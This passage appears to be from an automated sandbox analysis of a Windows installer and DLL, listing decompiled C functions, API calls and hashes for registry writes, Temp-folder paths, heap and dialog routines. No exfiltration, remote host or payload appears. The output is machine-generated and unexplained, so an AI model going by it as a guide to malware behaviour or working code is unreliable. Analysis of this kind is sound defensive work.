                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                  • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                                  • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                                  • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Atom$DeleteProp$ErrorLastRemove
                                                  • String ID:
                                                  • API String ID: 3987138204-0
                                                  • Opcode ID: 02c198ecc514611e5ef54a3d061e450e8e20de416660788afd041813f5a0e0b8
                                                  • Instruction ID: 2d340fa91e4131acd935894f876e959741a3496fd734fa6c2efc2443fb761517
                                                  • Opcode Fuzzy Hash: 02c198ecc514611e5ef54a3d061e450e8e20de416660788afd041813f5a0e0b8
                                                  • Instruction Fuzzy Hash: 17311EB4C0431ADBDB00EFA9C5492AEBBF0FF44350F10842AEC45A7354E7789A94CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E00402336(void* __eax) {
                                                  				void* _t15;
                                                  				char* _t18;
                                                  				int _t19;
                                                  				char _t24;
                                                  				int _t27;
                                                  				signed int _t30;
                                                  				intOrPtr _t35;
                                                  				void* _t37;
                                                  
                                                  				_t15 = E00402B1E(__eax);
                                                  				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                  				 *(_t37 - 0x34) =  *(_t37 - 0x14);
                                                  				 *(_t37 - 0x38) = E00402A29(2);
                                                  				_t18 = E00402A29(0x11);
                                                  				_t30 =  *0x42ecd0; // 0x0
                                                  				 *(_t37 - 4) = 1;
                                                  				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
                                                  				if(_t19 == 0) {
                                                  					if(_t35 == 1) {
                                                  						E00402A29(0x23);
                                                  						_t19 = lstrlenA(0x40a440) + 1;
                                                  					}
                                                  					if(_t35 == 4) {
                                                  						_t24 = E00402A0C(3);
                                                  						 *0x40a440 = _t24;
                                                  						_t19 = _t35;
                                                  					}
                                                  					if(_t35 == 3) {
                                                  						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a440, 0xc00);
                                                  					}
                                                  					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a440, _t19) == 0) {
                                                  						 *(_t37 - 4) = _t27;
                                                  					}
                                                  					_push( *(_t37 + 8));
                                                  					RegCloseKey();
                                                  				}
                                                  				 *0x42eca8 =  *0x42eca8 +  *(_t37 - 4);
                                                  				return 0;
                                                  			}












                                                  APIs
                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402374
                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nss48B9.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402394
                                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nss48B9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004023CD
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nss48B9.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 004024B0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CloseCreateValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nss48B9.tmp
                                                  • API String ID: 1356686001-3771091846
                                                  • Opcode ID: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                  • Instruction ID: 7eaf0ec052d83a67d7bbddc98f61bbb11a40701f4c7c8ad3ea5d843478098636
                                                  • Opcode Fuzzy Hash: 0dff74fc9814635757045e0884e09a6858b84c8ed7e39168be7b0d5a6897f032
                                                  • Instruction Fuzzy Hash: 2211A271E00108BFEB10EFA5DE89EAF7678EB40758F20403AF505B31D0D6B85D019A69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 96%
                                                  			E10007879(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                  				void* _t7;
                                                  				long _t8;
                                                  				intOrPtr* _t9;
                                                  				intOrPtr* _t12;
                                                  				long _t20;
                                                  				long _t31;
                                                  
                                                  				if(_a4 != 0) {
                                                  					_t31 = _a8;
                                                  					__eflags = _t31;
                                                  					if(_t31 != 0) {
                                                  						_push(__ebx);
                                                  						while(1) {
                                                  							__eflags = _t31 - 0xffffffe0;
                                                  							if(_t31 > 0xffffffe0) {
                                                  								break;
                                                  							}
                                                  							__eflags = _t31;
                                                  							if(_t31 == 0) {
                                                  								_t31 = _t31 + 1;
                                                  								__eflags = _t31;
                                                  							}
                                                  							_t7 = HeapReAlloc( *0x1001772c, 0, _a4, _t31);
                                                  							_t20 = _t7;
                                                  							__eflags = _t20;
                                                  							if(_t20 != 0) {
                                                  								L17:
                                                  								_t8 = _t20;
                                                  							} else {
                                                  								__eflags =  *0x100191e8 - _t7;
                                                  								if(__eflags == 0) {
                                                  									_t9 = E10006E77(__eflags);
                                                  									 *_t9 = E10006EBE(GetLastError());
                                                  									goto L17;
                                                  								} else {
                                                  									__eflags = E100071EE(_t7, _t31);
                                                  									if(__eflags == 0) {
                                                  										_t12 = E10006E77(__eflags);
                                                  										 *_t12 = E10006EBE(GetLastError());
                                                  										L12:
                                                  										_t8 = 0;
                                                  										__eflags = 0;
                                                  									} else {
                                                  										continue;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L14;
                                                  						}
                                                  						E100071EE(_t6, _t31);
                                                  						 *((intOrPtr*)(E10006E77(__eflags))) = 0xc;
                                                  						goto L12;
                                                  					} else {
                                                  						E10005653(_a4);
                                                  						_t8 = 0;
                                                  					}
                                                  					L14:
                                                  					return _t8;
                                                  				} else {
                                                  					return E100077E7(__ebx, __edx, __edi, _a8);
                                                  				}
                                                  			}










                                                  APIs
                                                  • _malloc.LIBCMT ref: 10007885
                                                    • Part of subcall function 100077E7: __FF_MSGBANNER.LIBCMT ref: 100077FE
                                                    • Part of subcall function 100077E7: __NMSG_WRITE.LIBCMT ref: 10007805
                                                    • Part of subcall function 100077E7: HeapAlloc.KERNEL32(00770000,00000000,00000001,00000000,00000000,00000000,?,10005B7A,?,?,?,00000000,?,10005EFF,00000018,10014640), ref: 1000782A
                                                  • _free.LIBCMT ref: 10007898
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AllocHeap_free_malloc
                                                  • String ID:
                                                  • API String ID: 2734353464-0
                                                  • Opcode ID: 9aca786a58cbca4b773bb62be2f12075f5288c3423c812c051a31eb724ccd4d2
                                                  • Instruction ID: c0f5aa5bbe505466c8efabbe68270b10f69c4a9177ca05cf10848bd3a1d8109e
                                                  • Opcode Fuzzy Hash: 9aca786a58cbca4b773bb62be2f12075f5288c3423c812c051a31eb724ccd4d2
                                                  • Instruction Fuzzy Hash: 84119436D44356ABFB219B74DC49A4A37D5FB042E0B21C526FD0C9A199DF38D840C791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E00402A69(void* _a4, char* _a8, long _a12) {
                                                  				void* _v8;
                                                  				char _v272;
                                                  				signed char _t16;
                                                  				long _t18;
                                                  				long _t25;
                                                  				intOrPtr* _t27;
                                                  				long _t28;
                                                  
                                                  				_t16 =  *0x42ecd0; // 0x0
                                                  				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
                                                  				if(_t18 == 0) {
                                                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                  						__eflags = _a12;
                                                  						if(_a12 != 0) {
                                                  							RegCloseKey(_v8);
                                                  							L8:
                                                  							__eflags = 1;
                                                  							return 1;
                                                  						}
                                                  						_t25 = E00402A69(_v8,  &_v272, 0);
                                                  						__eflags = _t25;
                                                  						if(_t25 != 0) {
                                                  							break;
                                                  						}
                                                  					}
                                                  					RegCloseKey(_v8);
                                                  					_t27 = E00405F57(4);
                                                  					if(_t27 == 0) {
                                                  						__eflags =  *0x42ecd0; // 0x0
                                                  						if(__eflags != 0) {
                                                  							goto L8;
                                                  						}
                                                  						_t28 = RegDeleteKeyA(_a4, _a8);
                                                  						__eflags = _t28;
                                                  						if(_t28 != 0) {
                                                  							goto L8;
                                                  						}
                                                  						return _t28;
                                                  					}
                                                  					return  *_t27(_a4, _a8,  *0x42ecd0, 0);
                                                  				}
                                                  				return _t18;
                                                  			}











                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                  • Instruction ID: 1feb4b7649154eaa2fe5ae549c730efe0d3e9f21b7ed1b50a1ad382232646690
                                                  • Opcode Fuzzy Hash: d3779c3a1c279bf6a31e0a00074fd3f509a71b7746d481b871f324af868c8b3c
                                                  • Instruction Fuzzy Hash: DF116A71600009FEDF21AF91DE89DAA3B79FB04354F104076FA05E00A0DBB99E51BF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00401CDE(int __edx) {
                                                  				void* _t17;
                                                  				struct HINSTANCE__* _t21;
                                                  				struct HWND__* _t25;
                                                  				void* _t27;
                                                  
                                                  				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                  				GetClientRect(_t25, _t27 - 0x50);
                                                  				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                                  				if(_t17 != _t21) {
                                                  					DeleteObject(_t17);
                                                  				}
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t27 - 4));
                                                  				return 0;
                                                  			}








                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00401CE2
                                                  • GetClientRect.USER32 ref: 00401CEF
                                                  • LoadImageA.USER32 ref: 00401D10
                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                  • Instruction ID: 7835fe8bf079333df41a7cdc3f5accb8fa20f3c3d3d5b8549a113c77ab23cea9
                                                  • Opcode Fuzzy Hash: 7c24492a2b1aaffc464dc9fd8bbcb84ba4fc277a470a63d707f881b65c2f59f1
                                                  • Instruction Fuzzy Hash: BDF0EC72A04118AFE701EBE4DE88DAFB77CEB44305B14443AF501F6190C7749D019B79
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: LoadStringlstrcpyn
                                                  • String ID: (%s,%s,%p,%d)$documentation
                                                  • API String ID: 2121282593-3639689978
                                                  • Opcode ID: 98ba3239289e0b240a8c53f47292207050e1ce45298aa1d5c42e23037c28392a
                                                  • Instruction ID: fd03d3c765fbebab6068a98880ea52e749a53358c1f510bc2b13bf7e0e455dfd
                                                  • Opcode Fuzzy Hash: 98ba3239289e0b240a8c53f47292207050e1ce45298aa1d5c42e23037c28392a
                                                  • Instruction Fuzzy Hash: 1D7170B4D082199FDB04DFA9D5857AEBBF0FF48350F10882AE899A7345D7349941CF52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 77%
                                                  			E00404678(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                  				char _v36;
                                                  				char _v68;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t21;
                                                  				signed int _t22;
                                                  				void* _t29;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				void* _t41;
                                                  				signed int _t43;
                                                  				signed int _t47;
                                                  				signed int _t50;
                                                  				signed int _t51;
                                                  				signed int _t53;
                                                  
                                                  				_t21 = _a16;
                                                  				_t51 = _a12;
                                                  				_t41 = 0xffffffdc;
                                                  				if(_t21 == 0) {
                                                  					_push(0x14);
                                                  					_pop(0);
                                                  					_t22 = _t51;
                                                  					if(_t51 < 0x100000) {
                                                  						_push(0xa);
                                                  						_pop(0);
                                                  						_t41 = 0xffffffdd;
                                                  					}
                                                  					if(_t51 < 0x400) {
                                                  						_t41 = 0xffffffde;
                                                  					}
                                                  					if(_t51 < 0xffff3333) {
                                                  						_t50 = 0x14;
                                                  						asm("cdq");
                                                  						_t22 = 1 / _t50 + _t51;
                                                  					}
                                                  					_t23 = _t22 & 0x00ffffff;
                                                  					_t53 = _t22 >> 0;
                                                  					_t43 = 0xa;
                                                  					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                  				} else {
                                                  					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                  					_t47 = 0;
                                                  				}
                                                  				_t29 = E00405BE9(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                  				_t31 = E00405BE9(_t41, _t47, _t53,  &_v68, _t41);
                                                  				_t32 = E00405BE9(_t41, _t47, 0x42a0a0, 0x42a0a0, _a8);
                                                  				wsprintfA(_t32 + lstrlenA(0x42a0a0), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                  				return SetDlgItemTextA( *0x42e3f8, _a4, 0x42a0a0);
                                                  			}




















                                                  APIs
                                                  • lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                  • wsprintfA.USER32 ref: 0040471E
                                                  • SetDlgItemTextA.USER32 ref: 00404731
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s
                                                  • API String ID: 3540041739-3551169577
                                                  • Opcode ID: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                  • Instruction ID: 062a34f2e1a42b9bac053d54189fda3392bb7b96bf994c182a5c545f77b0e815
                                                  • Opcode Fuzzy Hash: 6c6975893237cdfa5224ded18cab2bae0030b0bcb524b99bf5bfa446dcdb2360
                                                  • Instruction Fuzzy Hash: CD110673A041282BEB00656D9C41EAF32D8DB86334F290637FA25F71D1E979EC1246E9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 51%
                                                  			E00401BCA() {
                                                  				signed int _t28;
                                                  				CHAR* _t31;
                                                  				long _t32;
                                                  				int _t37;
                                                  				signed int _t38;
                                                  				int _t42;
                                                  				int _t48;
                                                  				struct HWND__* _t52;
                                                  				void* _t55;
                                                  
                                                  				 *(_t55 - 8) = E00402A0C(3);
                                                  				 *(_t55 + 8) = E00402A0C(4);
                                                  				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                  					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
                                                  				}
                                                  				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                  				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                  					 *(_t55 + 8) = E00402A29(0x44);
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                  				_push(1);
                                                  				if(__eflags != 0) {
                                                  					_t50 = E00402A29();
                                                  					_t28 = E00402A29();
                                                  					asm("sbb ecx, ecx");
                                                  					asm("sbb eax, eax");
                                                  					_t31 =  ~( *_t27) & _t50;
                                                  					__eflags = _t31;
                                                  					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                  					goto L10;
                                                  				} else {
                                                  					_t52 = E00402A0C();
                                                  					_t37 = E00402A0C();
                                                  					_t48 =  *(_t55 - 0x14) >> 2;
                                                  					if(__eflags == 0) {
                                                  						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                                  						L10:
                                                  						 *(_t55 - 0xc) = _t32;
                                                  					} else {
                                                  						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                  						asm("sbb eax, eax");
                                                  						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                  					}
                                                  				}
                                                  				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                  				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                  					_push( *(_t55 - 0xc));
                                                  					E00405B25();
                                                  				}
                                                  				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t55 - 4));
                                                  				return 0;
                                                  			}













                                                  APIs
                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                  • Instruction ID: 4d3ef85e63b9541cbe972d5e7c3a425ff70263948fb1d71cee34ed50e591440d
                                                  • Opcode Fuzzy Hash: d44a61a2a2c95e3216d06c81e49a509776d28ac41f2de2fd4f53c7e5812b41e9
                                                  • Instruction Fuzzy Hash: B821A171A44149BEEF02AFF5C94AAEE7B75DF44704F10407EF501BA1D1DAB88A40DB29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 16%
                                                  			E10004C79(void* __ecx, intOrPtr _a4) {
                                                  				struct HINSTANCE__* _v8;
                                                  				_Unknown_base(*)()* _t4;
                                                  
                                                  				_t4 =  &_v8;
                                                  				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                                                  				if(_t4 != 0) {
                                                  					_t4 = GetProcAddress(_v8, "CorExitProcess");
                                                  					if(_t4 != 0) {
                                                  						return  *_t4(_a4);
                                                  					}
                                                  				}
                                                  				return _t4;
                                                  			}






                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10004C6E,?,?,10007814,000000FF,0000001E,00000000,00000000,00000000,?,10005B7A), ref: 10004C88
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004C9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.364466627.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.364460119.0000000010000000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364500007.000000001000F000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.364511538.0000000010015000.00000040.00020000.sdmp
                                                  • Associated: 00000000.00000002.364522887.0000000010017000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.364528614.000000001001A000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 1646373207-1276376045
                                                  • Opcode ID: cff8e316798ae6f3d71e6cc43d6b6b535b07d30a3db414547cf85322c693f123
                                                  • Instruction ID: 4f9d14caf78538106cc4662b4f2d4ce25a7b6affe099018ac5781bab106ac7c5
                                                  • Opcode Fuzzy Hash: cff8e316798ae6f3d71e6cc43d6b6b535b07d30a3db414547cf85322c693f123
                                                  • Instruction Fuzzy Hash: 72D0127460510CBFFB85DB91CD45FE97BACDB04585F014054FA08E4460DB72CA509695
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004056BA(CHAR* _a4) {
                                                  				CHAR* _t7;
                                                  
                                                  				_t7 = _a4;
                                                  				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                  					lstrcatA(_t7, 0x409010);
                                                  				}
                                                  				return _t7;
                                                  			}





                                                  APIs
                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C0
                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403117,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004056C9
                                                  • lstrcatA.KERNEL32(?,00409010), ref: 004056DA
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004056BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.361724465.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.361715451.0000000000400000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361750806.0000000000407000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.361760887.0000000000409000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361785333.000000000042C000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361805335.0000000000434000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.361832060.0000000000437000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3936084776
                                                  • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction ID: 80516fad0c4d4920465a9bb29442f27547f360336c83292ed6deef4f7ecf272a
                                                  • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                  • Instruction Fuzzy Hash: 88D0A962A09A302AE20223198C05F9B7AA8CF02351B080862F140B6292C27C3C818BFE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E1000A162(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				char _v8;
                                                  				intOrPtr _v12;
                                                  				int _v20;
                                                  				void* __ebx;
                                                  				int _t35;
                                                  				int _t38;
                                                  				intOrPtr* _t44;
                                                  				int _t47;
                                                  				short* _t49;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				int _t55;
                                                  				int _t59;
                                                  				char* _t62;
                                                  
                                                  				_t62 = _a8;
                                                  				if(_t62 == 0) {
                                                  					L5:
                                                  					return 0;
                                                  				}
                                                  				_t50 = _a12;
                                                  				if(_t50 == 0) {
                                                  					goto L5;
                                                  				}
                                                  				if( *_t62 != 0) {
                                                  					E100065B9(_t50,  &_v20, _a16);
                                                  					_t35 = _v20;
                                                  					__eflags =  *(_t35 + 0xa8);
                                                  					if( *(_t35 + 0xa8) != 0) {
                                                  						_t38 = E1000A09D( *_t62 & 0x000000ff,  &_v20);
                                                  						__eflags = _t38;
                                                  						if(_t38 == 0) {
                                                  							__eflags = _a4;
                                                  							_t59 = 1;
                                                  							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                  							if(__eflags != 0) {
                                                  								L21:
                                                  								__eflags = _v8;
                                                  								if(_v8 != 0) {
                                                  									_t54 = _v12;
                                                  									_t31 = _t54 + 0x70;
                                                  									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                  									__eflags =  *_t31;
                                                  								}
                                                  								return _t59;
                                                  							}
                                                  							L20:
                                                  							_t44 = E10006E77(__eflags);
                                                  							_t59 = _t59 | 0xffffffff;
